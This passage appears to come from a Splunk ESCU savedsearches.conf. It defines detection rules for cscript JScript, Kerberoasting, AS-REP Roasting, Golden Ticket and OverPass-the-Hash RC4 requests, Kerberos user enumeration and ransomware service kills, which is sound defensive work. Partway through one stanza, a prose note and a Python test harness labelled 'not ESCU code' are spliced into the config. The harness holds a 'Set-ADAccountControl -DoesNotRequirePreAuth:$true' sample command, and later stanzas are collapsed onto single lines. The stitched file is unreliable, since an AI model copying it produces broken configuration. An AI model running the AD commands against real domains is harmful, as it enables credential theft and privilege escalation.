action.risk.param._risk_message = Process $process_name$ with command line $process$ executed JScript on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Jscript Execution Using Cscript App - Rule
action.correlationsearch.annotations = {"analytic_story": ["FIN7", "Remcos"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.007"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search detects the execution of JScript using the cscript process. Commonly, when a user runs a JScript file it is executed by the wscript.exe application. This technique was seen in the FIN7 JS implant, which executed its malicious script using the cscript process. This behavior is uncommon and a good artifact for checking for further anomalies within the network.
action.notable.param.rule_title = Jscript Execution Using Cscript App
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name = "cscript.exe" AND Processes.parent_process = "*//e:jscript*") OR (Processes.process_name = "cscript.exe" AND Processes.process = "*//e:jscript*") by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process_id Processes.process Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `jscript_execution_using_cscript_app_filter`

[ESCU - Kerberoasting spn request with RC4 encryption - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic leverages Kerberos Event 4769, A Kerberos service ticket was requested, to identify a potential Kerberoasting attack against Active Directory networks. Kerberoasting allows an adversary to request Kerberos service tickets for domain accounts typically used as service accounts and attempt to crack them offline, allowing them to obtain privileged access to the domain. This analytic looks for a specific combination of the Ticket_Options field based on common Kerberoasting tools. Defenders should be aware that it may be possible for a Kerberoasting attack to use different Ticket_Options.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558", "T1558.003"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic leverages Kerberos Event 4769, A Kerberos service ticket was requested, to identify a potential Kerberoasting attack against Active Directory networks. Kerberoasting allows an adversary to request Kerberos service tickets for domain accounts typically used as service accounts and attempt to crack them offline, allowing them to obtain privileged access to the domain. This analytic looks for a specific combination of the Ticket_Options field based on common Kerberoasting tools. Defenders should be aware that it may be possible for a Kerberoasting attack to use different Ticket_Options.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Domain Controller and Kerberos events. Event 4769 is produced by the Advanced Security Audit policy setting `Audit Kerberos Service Ticket Operations` within `Account Logon`, which needs to be enabled.
action.escu.known_false_positives = Older systems that support Kerberos RC4 by default, such as NetApp, may generate false positives. Filter as needed.
action.escu.creation_date = 2023-04-14
action.escu.modification_date = 2023-04-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Kerberoasting spn request with RC4 encryption - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Data Destruction", "Hermetic Wiper", "Windows Privilege Escalation", "Active Directory Kerberos Attacks"]
action.risk = 1
action.risk.param._risk_message = Potential Kerberoasting attack via service principal name requests detected on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Kerberoasting spn request with RC4 encryption - Rule
action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "Hermetic Wiper", "Windows Privilege Escalation", "Active Directory Kerberos Attacks"], "cis20": ["CIS 10"], "confidence": 80, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558", "T1558.003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic leverages Kerberos Event 4769, A Kerberos service ticket was requested, to identify a potential Kerberoasting attack against Active Directory networks. Kerberoasting allows an adversary to request Kerberos service tickets for domain accounts typically used as service accounts and attempt to crack them offline, allowing them to obtain privileged access to the domain. This analytic looks for a specific combination of the Ticket_Options field based on common Kerberoasting tools. Defenders should be aware that it may be possible for a Kerberoasting attack to use different Ticket_Options.
action.notable.param.rule_title = Kerberoasting spn request with RC4 encryption
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_security` EventCode=4769 Service_Name!="*$" (Ticket_Options=0x40810000 OR Ticket_Options=0x40800000 OR Ticket_Options=0x40810010) Ticket_Encryption_Type=0x17 | stats count min(_time) as firstTime max(_time) as lastTime by dest, service, service_id, Ticket_Encryption_Type, Ticket_Options | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `kerberoasting_spn_request_with_rc4_encryption_filter`

[ESCU - Kerberos Pre-Authentication Flag Disabled in UserAccountControl - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic leverages Windows Security Event 4738, `A user account was changed`, to identify a change performed on a domain user object that disables Kerberos Pre-Authentication. Disabling the Pre-Authentication flag in the UserAccountControl property allows an adversary to easily perform a brute force attack against the user's password offline leveraging the AS-REP Roasting technique. Red Teams and adversaries alike who have obtained privileges in an Active Directory network may use this technique as a backdoor or a way to escalate privileges.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558", "T1558.004"], "nist": ["DE.CM"]}
action.escu.data_models = ["Change"]
action.escu.eli5 = The following analytic leverages Windows Security Event 4738, `A user account was changed`, to identify a change performed on a domain user object that disables Kerberos Pre-Authentication. Disabling the Pre-Authentication flag in the UserAccountControl property allows an adversary to easily perform a brute force attack against the user's password offline leveraging the AS-REP Roasting technique. Red Teams and adversaries alike who have obtained privileges in an Active Directory network may use this technique as a backdoor or a way to escalate privileges.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Domain Controller events. The Advanced Security Audit policy setting `Audit User Account Management` within `Account Management` needs to be enabled.
action.escu.known_false_positives = Unknown.
action.escu.creation_date = 2022-02-22
action.escu.modification_date = 2022-02-22
action.escu.confidence = high
action.escu.full_search_name = ESCU - Kerberos Pre-Authentication Flag Disabled in UserAccountControl - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Active Directory Kerberos Attacks"]
action.risk = 1
action.risk.param._risk_message = Kerberos Pre-Authentication was disabled for $user$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 45}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Kerberos Pre-Authentication Flag Disabled in UserAccountControl - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Kerberos Attacks"], "cis20": ["CIS 10"], "confidence": 90, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558", "T1558.004"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic leverages Windows Security Event 4738, `A user account was changed`, to identify a change performed on a domain user object that disables Kerberos Pre-Authentication. Disabling the Pre-Authentication flag in the UserAccountControl property allows an adversary to easily perform a brute force attack against the user's password offline leveraging the AS-REP Roasting technique. Red Teams and adversaries alike who have obtained privileges in an Active Directory network may use this technique as a backdoor or a way to escalate privileges.
action.notable.param.rule_title = Kerberos Pre-Authentication Flag Disabled in UserAccountControl
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_security` EventCode=4738 MSADChangedAttributes="*Don't Require Preauth' - Enabled*" | rename Account_Name as user | table EventCode, user, dest, Security_ID, MSADChangedAttributes | `kerberos_pre_authentication_flag_disabled_in_useraccountcontrol_filter`

[ESCU - Kerberos Pre-Authentication Flag Disabled with PowerShell - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Set-ADAccountControl` cmdlet with specific parameters. `Set-ADAccountControl` is part of the Active Directory PowerShell module used to manage Windows Active Directory networks. As the name suggests, `Set-ADAccountControl` is used to modify User Account Control values for an Active Directory domain account. With the appropriate parameters, `Set-ADAccountControl` allows adversaries to disable Kerberos Pre-Authentication for an account in order to easily perform a brute force attack against the user's password offline leveraging the AS-REP Roasting technique. Red Teams and adversaries alike who have obtained privileges in an Active Directory network may use this technique as a backdoor or a way to escalate privileges.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558", "T1558.004"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Set-ADAccountControl` cmdlet with specific parameters. `Set-ADAccountControl` is part of the Active Directory PowerShell module used to manage Windows Active Directory networks. As the name suggests, `Set-ADAccountControl` is used to modify User Account Control values for an Active Directory domain account. With the appropriate parameters, `Set-ADAccountControl` allows adversaries to disable Kerberos Pre-Authentication for an account in order to easily perform a brute force attack against the user's password offline leveraging the AS-REP Roasting technique. Red Teams and adversaries alike who have obtained privileges in an Active Directory network may use this technique as a backdoor or a way to escalate privileges.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup instructions can be found at https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = Although unlikely, administrators may need to set this flag for legitimate purposes.
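The two Script Block Logging detections in this file ("Interactive Session on Remote Endpoint with PowerShell" and this `Set-ADAccountControl` rule) share one shape: EventCode 4104 plus an AND of case-insensitive `*substring*` wildcards on ScriptBlockText, then `stats count min(_time) max(_time) by ... Computer UserID`. The following Python is an added example, not ESCU code, that applies both patterns to constructed 4104 events. It assumes the field names Computer, UserID and ScriptBlockText for both rules (the `Set-ADAccountControl` search in this file groups by `user_id` instead) and that the AS-REP Roasting parameter is `-DoesNotRequirePreAuth:$true`, as the search string below states.

```python
"""Added example (not ESCU code): two PowerShell 4104 patterns over constructed events.

  - Interactive Session on Remote Endpoint with PowerShell:
        ScriptBlockText contains Enter-PSSession AND -ComputerName
  - Kerberos Pre-Authentication Flag Disabled with PowerShell:
        ScriptBlockText contains Set-ADAccountControl AND DoesNotRequirePreAuth:$true

SPL wildcard matches are case-insensitive, so the matcher lowercases the text.
"""
from collections import defaultdict

# Constructed 4104/4103 events; hosts, users and script text are invented.
EVENTS = [
    {"_time": 1700000000, "EventCode": 4104, "Computer": "jump01.corp.local",
     "UserID": "CORP\\admin1",
     "ScriptBlockText": "Enter-PSSession -ComputerName dc01 -Credential $cred"},
    {"_time": 1700000030, "EventCode": 4104, "Computer": "jump01.corp.local",
     "UserID": "CORP\\admin1",
     "ScriptBlockText": "Enter-PSSession -ComputerName dc01 -Credential $cred"},
    {"_time": 1700000060, "EventCode": 4104, "Computer": "ws42.corp.local",
     "UserID": "CORP\\jdoe",
     "ScriptBlockText": "Get-PSSession | Remove-PSSession"},
    {"_time": 1700000090, "EventCode": 4104, "Computer": "ws42.corp.local",
     "UserID": "CORP\\jdoe",
     "ScriptBlockText": "Set-ADAccountControl -Identity svc_backup -DoesNotRequirePreAuth:$true"},
    {"_time": 1700000120, "EventCode": 4104, "Computer": "ws42.corp.local",
     "UserID": "CORP\\jdoe",
     "ScriptBlockText": "set-adaccountcontrol -Identity svc_backup -DoesNotRequirePreAuth:$false"},
    {"_time": 1700000150, "EventCode": 4103, "Computer": "ws42.corp.local",
     "UserID": "CORP\\jdoe",
     "ScriptBlockText": "Enter-PSSession -ComputerName fs01"},   # module log, not 4104
]

# rule name -> substrings that must ALL appear (AND of "*x*" wildcards)
RULES = {
    "Interactive Session on Remote Endpoint with PowerShell":
        ("enter-pssession", "-computername"),
    "Kerberos Pre-Authentication Flag Disabled with PowerShell":
        ("set-adaccountcontrol", "doesnotrequirepreauth:$true"),
}


def matches(event, needles):
    """EventCode=4104 AND every needle present in ScriptBlockText (case-insensitive)."""
    if event.get("EventCode") != 4104:
        return False
    text = event.get("ScriptBlockText", "").lower()
    return all(n in text for n in needles)


def run_rules(events, rules=RULES):
    """Returns {rule: {(dest, user, ScriptBlockText): {count, firstTime, lastTime}}},
    mirroring `stats count min(_time) max(_time) by ... Computer UserID`
    followed by `rename Computer as dest`."""
    out = {name: defaultdict(lambda: {"count": 0, "firstTime": None, "lastTime": None})
           for name in rules}
    for ev in events:
        for name, needles in rules.items():
            if not matches(ev, needles):
                continue
            key = (ev["Computer"], ev["UserID"], ev["ScriptBlockText"])
            agg = out[name][key]
            agg["count"] += 1
            agg["firstTime"] = ev["_time"] if agg["firstTime"] is None else min(agg["firstTime"], ev["_time"])
            agg["lastTime"] = ev["_time"] if agg["lastTime"] is None else max(agg["lastTime"], ev["_time"])
    return {name: dict(groups) for name, groups in out.items()}


if __name__ == "__main__":
    for name, groups in run_rules(EVENTS).items():
        for (dest, user, text), agg in groups.items():
            print(f"{name}: dest={dest} user={user} count={agg['count']} :: {text}")
```

The `$false` variant and the 4103 module-logging event are deliberately included: the first shows why the search matches the literal `DoesNotRequirePreAuth:$true` rather than the cmdlet name alone, the second why the EventCode filter matters when both script block and module logging are enabled.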
action.escu.creation_date = 2022-03-22
action.escu.modification_date = 2022-03-22
action.escu.confidence = high
action.escu.full_search_name = ESCU - Kerberos Pre-Authentication Flag Disabled with PowerShell - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Active Directory Kerberos Attacks"]
action.risk = 1
action.risk.param._risk_message = Kerberos Pre-Authentication was disabled using PowerShell on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 45}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Kerberos Pre-Authentication Flag Disabled with PowerShell - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Kerberos Attacks"], "cis20": ["CIS 10"], "confidence": 90, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558", "T1558.004"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Set-ADAccountControl` cmdlet with specific parameters. `Set-ADAccountControl` is part of the Active Directory PowerShell module used to manage Windows Active Directory networks. As the name suggests, `Set-ADAccountControl` is used to modify User Account Control values for an Active Directory domain account. With the appropriate parameters, `Set-ADAccountControl` allows adversaries to disable Kerberos Pre-Authentication for an account in order to easily perform a brute force attack against the user's password offline leveraging the AS-REP Roasting technique. Red Teams and adversaries alike who have obtained privileges in an Active Directory network may use this technique as a backdoor or a way to escalate privileges.
action.notable.param.rule_title = Kerberos Pre-Authentication Flag Disabled with PowerShell
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 (ScriptBlockText = "*Set-ADAccountControl*" AND ScriptBlockText="*DoesNotRequirePreAuth:$true*") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `kerberos_pre_authentication_flag_disabled_with_powershell_filter`

[ESCU - Kerberos Service Ticket Request Using RC4 Encryption - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic leverages Kerberos Event 4769, A Kerberos service ticket was requested, to identify a potential Kerberos Service Ticket request related to a Golden Ticket attack. Adversaries who have obtained the krbtgt account NTLM password hash may forge a Kerberos Ticket Granting Ticket (TGT) to obtain unrestricted access to an Active Directory environment. Armed with a Golden Ticket, attackers can request service tickets to move laterally and execute code on remote systems. Looking for Kerberos Service Ticket requests using the legacy RC4 encryption mechanism could represent the second stage of a Golden Ticket attack. RC4 usage should be rare on a modern network since Windows Vista, Windows Server 2008 and newer support AES Kerberos encryption. Defenders should note that if an attacker does not leverage the NTLM password hash but rather the AES key to create a golden ticket, this detection may be bypassed.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558", "T1558.001"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic leverages Kerberos Event 4769, A Kerberos service ticket was requested, to identify a potential Kerberos Service Ticket request related to a Golden Ticket attack. Adversaries who have obtained the krbtgt account NTLM password hash may forge a Kerberos Ticket Granting Ticket (TGT) to obtain unrestricted access to an Active Directory environment. Armed with a Golden Ticket, attackers can request service tickets to move laterally and execute code on remote systems. Looking for Kerberos Service Ticket requests using the legacy RC4 encryption mechanism could represent the second stage of a Golden Ticket attack. RC4 usage should be rare on a modern network since Windows Vista, Windows Server 2008 and newer support AES Kerberos encryption. Defenders should note that if an attacker does not leverage the NTLM password hash but rather the AES key to create a golden ticket, this detection may be bypassed.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Domain Controller and Kerberos events. Event 4769 is produced by the Advanced Security Audit policy setting `Audit Kerberos Service Ticket Operations` within `Account Logon`, which needs to be enabled.
action.escu.known_false_positives = Based on Microsoft documentation, legacy systems or applications will use RC4-HMAC as the default encryption for Kerberos Service Ticket requests, specifically systems before Windows Server 2008 and Windows Vista. Newer systems will use AES128 or AES256.
action.escu.creation_date = 2022-03-15
action.escu.modification_date = 2022-03-15
action.escu.confidence = high
action.escu.full_search_name = ESCU - Kerberos Service Ticket Request Using RC4 Encryption - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Active Directory Kerberos Attacks", "Active Directory Privilege Escalation"]
action.risk = 1
action.risk.param._risk_message = A Kerberos Service Ticket request with RC4 encryption was requested from $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 45}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Kerberos Service Ticket Request Using RC4 Encryption - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Kerberos Attacks", "Active Directory Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 50, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558", "T1558.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic leverages Kerberos Event 4769, A Kerberos service ticket was requested, to identify a potential Kerberos Service Ticket request related to a Golden Ticket attack. Adversaries who have obtained the krbtgt account NTLM password hash may forge a Kerberos Ticket Granting Ticket (TGT) to obtain unrestricted access to an Active Directory environment. Armed with a Golden Ticket, attackers can request service tickets to move laterally and execute code on remote systems. Looking for Kerberos Service Ticket requests using the legacy RC4 encryption mechanism could represent the second stage of a Golden Ticket attack. RC4 usage should be rare on a modern network since Windows Vista, Windows Server 2008 and newer support AES Kerberos encryption. Defenders should note that if an attacker does not leverage the NTLM password hash but rather the AES key to create a golden ticket, this detection may be bypassed.
action.notable.param.rule_title = Kerberos Service Ticket Request Using RC4 Encryption
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_security` EventCode=4769 Service_Name="*$" (Ticket_Options=0x40810000 OR Ticket_Options=0x40800000 OR Ticket_Options=0x40810010) Ticket_Encryption_Type=0x17 | stats count min(_time) as firstTime max(_time) as lastTime by dest, service, service_id, Ticket_Encryption_Type, Ticket_Options | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `kerberos_service_ticket_request_using_rc4_encryption_filter`

[ESCU - Kerberos TGT Request Using RC4 Encryption - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic leverages Event 4768, A Kerberos authentication ticket (TGT) was requested, to identify a TGT request with encryption type 0x17, or RC4-HMAC. This encryption type is no longer used by default on newer systems and could represent evidence of an OverPass The Hash attack. Similar to Pass The Hash, OverPass The Hash is a form of credential theft that allows adversaries to move laterally or consume resources in a target network. Leveraging this attack, an adversary who has stolen the NTLM hash of a valid domain account is able to authenticate to the Key Distribution Center (KDC) on behalf of the legitimate account and obtain a Kerberos TGT. Depending on the privileges of the compromised account, this ticket may be used to obtain unauthorized access to systems and other network resources.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1550"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic leverages Event 4768, A Kerberos authentication ticket (TGT) was requested, to identify a TGT request with encryption type 0x17, or RC4-HMAC. This encryption type is no longer used by default on newer systems and could represent evidence of an OverPass The Hash attack. Similar to Pass The Hash, OverPass The Hash is a form of credential theft that allows adversaries to move laterally or consume resources in a target network. Leveraging this attack, an adversary who has stolen the NTLM hash of a valid domain account is able to authenticate to the Key Distribution Center (KDC) on behalf of the legitimate account and obtain a Kerberos TGT. Depending on the privileges of the compromised account, this ticket may be used to obtain unauthorized access to systems and other network resources.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Domain Controller and Kerberos events. Event 4768 is produced by the Advanced Security Audit policy setting `Audit Kerberos Authentication Service` within `Account Logon`, which needs to be enabled.
action.escu.known_false_positives = Based on Microsoft documentation, legacy systems or applications will use RC4-HMAC as the default encryption for TGT requests, specifically systems before Windows Server 2008 and Windows Vista. Newer systems will use AES128 or AES256.
action.escu.creation_date = 2022-03-04 action.escu.modification_date = 2022-03-04 action.escu.confidence = high action.escu.full_search_name = ESCU - Kerberos TGT Request Using RC4 Encryption - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Kerberos Attacks"] action.risk = 1 action.risk.param._risk_message = A Kerberos TGT request with RC4 encryption was requested for $Account_Name$ from $Client_Address$ action.risk.param._risk = [{"risk_object_field": "Client_Address", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kerberos TGT Request Using RC4 Encryption - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Kerberos Attacks"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1550"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic leverages Event 4768, A Kerberos authentication ticket (TGT) was requested, to identify a TGT request with encryption type 0x17, or RC4-HMAC. This encryption type is no longer utilized by newer systems and could represent evidence of an OverPass The Hash attack. Similar to Pass The Hash, OverPass The Hash is a form of credential theft that allows adversaries to move laterally or consume resources in a target network. 
Leveraging this attack, an adversary who has stolen the NTLM hash of a valid domain account is able to authenticate to the Kerberos Distribution Center(KDC) on behalf of the legitimate account and obtain a Kerberos TGT ticket. Depending on the privileges of the compromised account, this ticket may be used to obtain unauthorized access to systems and other network resources. action.notable.param.rule_title = Kerberos TGT Request Using RC4 Encryption action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4768 Ticket_Encryption_Type=0x17 Account_Name!=*$ | stats count min(_time) as firstTime max(_time) as lastTime by Account_Name Client_Address dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `kerberos_tgt_request_using_rc4_encryption_filter` [ESCU - Kerberos User Enumeration - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic leverages Event Id 4768, A Kerberos authentication ticket (TGT) was requested, to identify one source endpoint trying to obtain an unusual number Kerberos TGT ticket for non existing users. This behavior could represent an adversary abusing the Kerberos protocol to perform a user enumeration attack against an Active Directory environment. When Kerberos is sent a TGT request with no preauthentication for an invalid username, it responds with KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN or 0x6. Red teams and adversaries alike may abuse the Kerberos protocol to validate a list of users use them to perform further attacks.\ The detection calculates the standard deviation for each host and leverages the 3-sigma statistical rule to identify an unusual number requests. 
To customize this analytic, users can try different combinations of the `bucket` span time and the calculation of the `upperBound` field. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Reconnaissance"], "mitre_attack": ["T1589", "T1589.002"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic leverages Event Id 4768, A Kerberos authentication ticket (TGT) was requested, to identify one source endpoint trying to obtain an unusual number Kerberos TGT ticket for non existing users. This behavior could represent an adversary abusing the Kerberos protocol to perform a user enumeration attack against an Active Directory environment. When Kerberos is sent a TGT request with no preauthentication for an invalid username, it responds with KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN or 0x6. Red teams and adversaries alike may abuse the Kerberos protocol to validate a list of users use them to perform further attacks.\ The detection calculates the standard deviation for each host and leverages the 3-sigma statistical rule to identify an unusual number requests. To customize this analytic, users can try different combinations of the `bucket` span time and the calculation of the `upperBound` field. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Domain Controller and Kerberos events. The Advanced Security Audit policy setting `Audit Kerberos Authentication Service` within `Account Logon` needs to be enabled. action.escu.known_false_positives = Possible false positive scenarios include but are not limited to vulnerability scanners and missconfigured systems. 
action.escu.creation_date = 2022-03-10 action.escu.modification_date = 2022-03-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Kerberos User Enumeration - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Kerberos Attacks"] action.risk = 1 action.risk.param._risk_message = Potential Kerberos based user enumeration attack $Client_Address$ action.risk.param._risk = [{"risk_object_field": "Client_Address", "risk_object_type": "system", "risk_score": 24}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kerberos User Enumeration - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Kerberos Attacks"], "cis20": ["CIS 10"], "confidence": 80, "impact": 30, "kill_chain_phases": ["Reconnaissance"], "mitre_attack": ["T1589", "T1589.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4768 Result_Code=0x6 Account_Name!="*$" | bucket span=2m _time | stats dc(Account_Name) AS unique_accounts values(Account_Name) as tried_accounts by _time, Client_Address | eventstats avg(unique_accounts) as comp_avg , stdev(unique_accounts) as comp_std by Client_Address | eval upperBound=(comp_avg+comp_std*3) | eval isOutlier=if(unique_accounts > 10 and unique_accounts >= upperBound, 1, 0) | search isOutlier=1 | `kerberos_user_enumeration_filter` [ESCU - Known Services Killed by Ransomware - Rule] action.escu = 0 action.escu.enabled = 1 description = This search 
detects a suspicioous termination of known services killed by ransomware before encrypting files in a compromised machine. This technique is commonly seen in most of ransomware now a days to avoid exception error while accessing the targetted files it wants to encrypts because of the open handle of those services to the targetted file. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search detects a suspicioous termination of known services killed by ransomware before encrypting files in a compromised machine. This technique is commonly seen in most of ransomware now a days to avoid exception error while accessing the targetted files it wants to encrypts because of the open handle of those services to the targetted file. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the 7036 EventCode ScManager in System audit Logs from your endpoints. action.escu.known_false_positives = Admin activities or installing related updates may do a sudden stop to list of services we monitor. 
